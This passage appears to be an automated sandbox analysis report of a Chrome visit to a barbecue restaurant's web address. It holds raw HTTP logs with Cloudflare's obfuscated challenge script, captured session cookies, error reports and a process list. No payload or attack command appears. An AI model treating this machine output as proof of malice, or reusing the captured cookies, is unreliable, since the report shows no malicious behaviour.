                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:22 UTC892INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:22 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 8738
                                                        Connection: close
                                                        cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                        x-content-type-options: nosniff
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5EOigQFswPS3baYDpmNc4l8S56oZ%2FvecKX1BZ0%2F4lKGVXnrozr4M1RRwDjmw1mRzTI6UMlzjFAIRzX77e61iBVEWvREnhcO48ps0DPUMduJrhPeZ5QffAt%2BLqgqw%2B0cVgfh"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f7506827c9cc34f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1458&rtt_var=555&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1435&delivery_rate=1957104&cwnd=181&unsent_bytes=0&cid=6bc90edaf314996d&ts=555&x=0"
                                                        2024-12-25 01:23:22 UTC477INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6e 2c 6f 2c 79 2c 7a 2c 42 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 56 2c 65 2c 66 29 7b 66 6f 72 28 56 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 35 33 34 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 56 28 35 30 37 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 34 39 35 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 56 28 35 30 32 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 35 38 38 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 56 28 35 34 36 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 56 28 35 34 32 29 29 2f 37 2a 28 70 61 72
                                                        Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(534))/1*(parseInt(V(507))/2)+-parseInt(V(495))/3+parseInt(V(502))/4+-parseInt(V(588))/5*(parseInt(V(546))/6)+parseInt(V(542))/7*(par
                                                        2024-12-25 01:23:22 UTC1369INData Raw: 35 29 5d 3d 27 6e 27 2c 6e 5b 57 28 35 33 32 29 5d 3d 27 49 27 2c 6e 5b 57 28 35 36 38 29 5d 3d 27 62 27 2c 6f 3d 6e 2c 68 5b 57 28 35 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 48 2c 61 38 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 61 38 3d 57 2c 6e 75 6c 6c 3d 3d 3d 46 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 29 72 65 74 75 72 6e 20 48 3b 66 6f 72 28 4a 3d 78 28 46 29 2c 45 5b 61 38 28 34 39 33 29 5d 5b 61 38 28 35 36 33 29 5d 26 26 28 4a 3d 4a 5b 61 38 28 35 35 32 29 5d 28 45 5b 61 38 28 34 39 33 29 5d 5b 61 38 28 35 36 33 29 5d 28 46 29 29 29 2c 4a 3d 45 5b 61 38 28 35 39 30 29 5d 5b 61 38 28 35 31 35 29 5d 26 26 45 5b 61 38 28 35 32 30 29 5d 3f 45 5b 61 38 28 35 39 30 29 5d 5b 61 38 28 35 31 35 29 5d 28 6e 65 77 20 45 5b 28 61 38
                                                        Data Ascii: 5)]='n',n[W(532)]='I',n[W(568)]='b',o=n,h[W(536)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,null===F||void 0===F)return H;for(J=x(F),E[a8(493)][a8(563)]&&(J=J[a8(552)](E[a8(493)][a8(563)](F))),J=E[a8(590)][a8(515)]&&E[a8(520)]?E[a8(590)][a8(515)](new E[(a8
                                                        2024-12-25 01:23:22 UTC1369INData Raw: 61 65 28 34 39 32 29 5d 5b 61 65 28 34 38 39 29 5d 28 49 2c 54 29 29 4b 3d 54 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 65 28 35 34 31 29 5d 5b 61 65 28 34 39 32 29 5d 5b 61 65 28 34 38 39 29 5d 28 4a 2c 4b 29 29 7b 69 66 28 32 35 36 3e 4b 5b 61 65 28 34 39 34 29 5d 28 30 29 29 7b 66 6f 72 28 48 3d 30 3b 48 3c 4e 3b 50 3c 3c 3d 31 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 35 30 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 65 28 34 39 34 29 5d 28 30 29 2c 48 3d 30 3b 38 3e 48 3b 50 3d 55 26 31 7c 50 3c 3c 31 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 35 30 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72
                                                        Data Ascii: ae(492)][ae(489)](I,T))K=T;else{if(Object[ae(541)][ae(492)][ae(489)](J,K)){if(256>K[ae(494)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[ae(550)](G(P)),P=0):Q++,H++);for(U=K[ae(494)](0),H=0;8>H;P=U&1|P<<1,Q==F-1?(Q=0,O[ae(550)](G(P)),P=0):Q++,U>>=1,H++);}else{for
                                                        2024-12-25 01:23:22 UTC1369INData Raw: 6c 3a 65 2e 69 28 45 5b 61 66 28 35 30 35 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 61 67 29 7b 72 65 74 75 72 6e 20 61 67 3d 61 66 2c 45 5b 61 67 28 34 39 34 29 5d 28 46 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 61 68 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 55 2c 54 29 7b 66 6f 72 28 61 68 3d 61 63 2c 48 3d 5b 5d 2c 49 3d 34 2c 4a 3d 34 2c 4b 3d 33 2c 4c 3d 5b 5d 2c 4f 3d 47 28 30 29 2c 50 3d 46 2c 51 3d 31 2c 4d 3d 30 3b 33 3e 4d 3b 48 5b 4d 5d 3d 4d 2c 4d 2b 3d 31 29 3b 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 68 28 34 38 32 29 5d 28 32 2c 32 29 2c 4e 3d 31 3b 4e 21 3d 53 3b 54 3d 4f 26 50 2c 50 3e 3e 3d 31 2c 30 3d 3d 50 26 26 28 50 3d 46 2c 4f 3d 47 28 51 2b 2b
                                                        Data Ascii: l:e.i(E[af(505)],32768,function(F,ag){return ag=af,E[ag(494)](F)})},'i':function(E,F,G,ah,H,I,J,K,L,M,N,O,P,Q,R,S,U,T){for(ah=ac,H=[],I=4,J=4,K=3,L=[],O=G(0),P=F,Q=1,M=0;3>M;H[M]=M,M+=1);for(R=0,S=Math[ah(482)](2,2),N=1;N!=S;T=O&P,P>>=1,0==P&&(P=F,O=G(Q++
                                                        2024-12-25 01:23:22 UTC1369INData Raw: 75 72 6e 3b 28 64 3d 21 5b 5d 2c 65 3d 63 5b 61 69 28 34 38 36 29 5d 3d 3d 3d 21 21 5b 5d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 6a 2c 46 29 7b 28 61 6a 3d 61 69 2c 21 64 29 26 26 28 64 3d 21 21 5b 5d 2c 46 3d 41 28 29 2c 6c 28 46 2e 72 2c 66 75 6e 63 74 69 6f 6e 28 47 29 7b 44 28 63 2c 47 29 7d 29 2c 46 2e 65 26 26 6d 28 61 6a 28 35 38 34 29 2c 46 2e 65 29 29 7d 2c 69 5b 61 69 28 35 30 31 29 5d 21 3d 3d 61 69 28 35 39 39 29 29 3f 66 28 29 3a 68 5b 61 69 28 35 33 30 29 5d 3f 69 5b 61 69 28 35 33 30 29 5d 28 61 69 28 35 37 39 29 2c 66 29 3a 28 45 3d 69 5b 61 69 28 34 39 39 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 5b 61 69 28 34 39 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 6b 29 7b 61 6b 3d 61 69 2c 45 28 29 2c 69 5b 61 6b 28 35 30 31 29 5d 21
                                                        Data Ascii: urn;(d=![],e=c[ai(486)]===!![],f=function(aj,F){(aj=ai,!d)&&(d=!![],F=A(),l(F.r,function(G){D(c,G)}),F.e&&m(aj(584),F.e))},i[ai(501)]!==ai(599))?f():h[ai(530)]?i[ai(530)](ai(579),f):(E=i[ai(499)]||function(){},i[ai(499)]=function(ak){ak=ai,E(),i[ak(501)]!
                                                        2024-12-25 01:23:22 UTC1369INData Raw: 35 38 29 5d 28 27 2b 27 2c 61 33 28 35 30 34 29 29 2c 4b 5b 61 33 28 35 37 35 29 5d 28 27 76 5f 27 2b 49 2e 72 2b 27 3d 27 2b 50 29 7d 63 61 74 63 68 28 51 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 63 2c 64 2c 5a 2c 65 2c 66 2c 45 2c 46 29 7b 5a 3d 57 2c 65 3d 68 5b 5a 28 34 38 37 29 5d 2c 66 3d 65 2e 72 2c 45 3d 7b 27 77 70 27 3a 42 5b 5a 28 35 37 37 29 5d 28 4a 53 4f 4e 5b 5a 28 35 35 34 29 5d 28 63 29 29 2c 27 73 27 3a 5a 28 35 34 38 29 7d 2c 46 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 46 5b 5a 28 35 31 38 29 5d 28 5a 28 35 33 33 29 2c 5a 28 35 30 36 29 2b 68 5b 5a 28 35 35 33 29 5d 5b 5a 28 36 30 30 29 5d 2b 5a 28 35 37 32 29 2b 66 29 2c 46 5b 5a 28 35 32 36 29 5d 28 5a 28 35 30 38 29 2c 5a 28 35 31 32 29 29 2c 65 5b 5a 28
                                                        Data Ascii: 58)]('+',a3(504)),K[a3(575)]('v_'+I.r+'='+P)}catch(Q){}}function l(c,d,Z,e,f,E,F){Z=W,e=h[Z(487)],f=e.r,E={'wp':B[Z(577)](JSON[Z(554)](c)),'s':Z(548)},F=new XMLHttpRequest(),F[Z(518)](Z(533),Z(506)+h[Z(553)][Z(600)]+Z(572)+f),F[Z(526)](Z(508),Z(512)),e[Z(
                                                        2024-12-25 01:23:22 UTC1369INData Raw: 52 36 46 44 36 78 41 6c 64 70 35 34 59 55 42 31 4c 67 42 4d 55 2f 2c 62 6f 6f 6c 65 61 6e 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 35 30 31 32 31 39 39 4a 70 63 4f 79 56 2c 63 61 74 63 68 2c 2f 6a 73 64 2f 72 2f 2c 69 73 41 72 72 61 79 2c 63 68 6c 41 70 69 41 43 43 48 2c 73 65 6e 64 2c 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2c 78 59 4c 59 69 63 67 70 55 2c 69 66 72 61 6d 65 2c 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 2c 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 69 6e 64 65 78 4f 66 2c 63 68 6c 41 70 69 43 6c 69 65 6e 74 56 65 72 73 69 6f 6e 2c 57 68 63 77 78 61 55 31 4d 56 59 2b 45 74 62 6b 53 6f 58 34 47 33 48 69 50 73 76 75 39 4c 72 30 38 6a 37 5a 36 79 65 64 4b 6c 44 71 35 7a 43 66 70 42 67 41 4a 24 6d 6e 46 4f 51 52 4e 2d 49 54 32 2c
                                                        Data Ascii: R6FD6xAldp54YUB1LgBMU/,boolean,contentWindow,5012199JpcOyV,catch,/jsd/r/,isArray,chlApiACCH,send,createElement,xYLYicgpU,iframe,DOMContentLoaded,errorInfoObject,indexOf,chlApiClientVersion,WhcwxaU1MVY+EtbkSoX4G3HiPsvu9Lr08j7Z6yedKlDq5zCfpBgAJ$mnFOQRN-IT2,
                                                        2024-12-25 01:23:22 UTC47INData Raw: 29 2c 47 5b 61 6c 28 35 30 30 29 5d 3d 66 2c 68 5b 61 6c 28 35 32 39 29 5d 5b 61 6c 28 35 33 38 29 5d 28 47 2c 27 2a 27 29 29 29 7d 7d 28 29
                                                        Data Ascii: ),G[al(500)]=f,h[al(529)][al(538)](G,'*')))}}()


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.449800104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:25 UTC846OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/8f7506295d20727b HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:25 UTC738INHTTP/1.1 405 Method Not Allowed
                                                        Date: Wed, 25 Dec 2024 01:23:25 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        allow: POST
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrpOxnvS90nT4enVqEQEa9fWbxEoMzjHyMP4jnvrTheqVC9Rlo%2FJhuImUrKhqrBVOA1DXbV1BCZaisdhID1zf9pgRg5O4tThEqOGzFHC5E5xtQB8pc%2Ffb1SSGQDx4spLgoYz"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f750694385043b3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1569&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1424&delivery_rate=1808049&cwnd=198&unsent_bytes=0&cid=6397ca248dad9a16&ts=446&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.44983735.190.80.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:24:06 UTC539OUTOPTIONS /report/v4?s=gSae%2FPvDViVNzZ1Dz67TD%2F4i4o4bjcMfByOZ6JG%2FMx3u22xJ2W34gXBlDyHEOpUHMxsHmDxCDUmyDM1w%2FjPGhaii2uHNIBPLGGoowpgEIBVBTCh8TY%2FCkxZ3s4P0MRNCQcoB HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://yungbucksbbq.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:24:07 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: OPTIONS, POST
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Wed, 25 Dec 2024 01:24:06 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.44983835.190.80.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:24:06 UTC533OUTOPTIONS /report/v4?s=UrpOxnvS90nT4enVqEQEa9fWbxEoMzjHyMP4jnvrTheqVC9Rlo%2FJhuImUrKhqrBVOA1DXbV1BCZaisdhID1zf9pgRg5O4tThEqOGzFHC5E5xtQB8pc%2Ffb1SSGQDx4spLgoYz HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://yungbucksbbq.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:24:07 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Wed, 25 Dec 2024 01:24:06 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.44984535.190.80.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:24:08 UTC474OUTPOST /report/v4?s=UrpOxnvS90nT4enVqEQEa9fWbxEoMzjHyMP4jnvrTheqVC9Rlo%2FJhuImUrKhqrBVOA1DXbV1BCZaisdhID1zf9pgRg5O4tThEqOGzFHC5E5xtQB8pc%2Ffb1SSGQDx4spLgoYz HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 443
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:24:08 UTC443OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 39 37 36 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 38 36 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 31 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 75 6e 67 62 75 63 6b 73 62 62 71
                                                        Data Ascii: [{"age":39761,"body":{"elapsed_time":2867,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.112.1","status_code":405,"type":"http.error"},"type":"network-error","url":"https://yungbucksbbq
                                                        2024-12-25 01:24:08 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Wed, 25 Dec 2024 01:24:08 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.44984435.190.80.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:24:08 UTC481OUTPOST /report/v4?s=gSae%2FPvDViVNzZ1Dz67TD%2F4i4o4bjcMfByOZ6JG%2FMx3u22xJ2W34gXBlDyHEOpUHMxsHmDxCDUmyDM1w%2FjPGhaii2uHNIBPLGGoowpgEIBVBTCh8TY%2FCkxZ3s4P0MRNCQcoB HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 1819
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:24:08 UTC1819OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 35 32 32 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 31 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 75 6e 67 62 75 63 6b 73 62 62 71 2e 63 6f 6d 2f 63 64 6e 2d 63 67 69 2f 63 68
                                                        Data Ascii: [{"age":55229,"body":{"elapsed_time":1014,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},"type":"network-error","url":"https://yungbucksbbq.com/cdn-cgi/ch
                                                        2024-12-25 01:24:08 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Wed, 25 Dec 2024 01:24:08 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:20:22:52
                                                        Start date:24/12/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:1
                                                        Start time:20:22:53
                                                        Start date:24/12/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2204,i,10793580977582758868,3268384068697070233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:20:23:00
                                                        Start date:24/12/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yungbucksbbq.com/portbiz/"
                                                        Imagebase:0x7ff76e190000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        No disassembly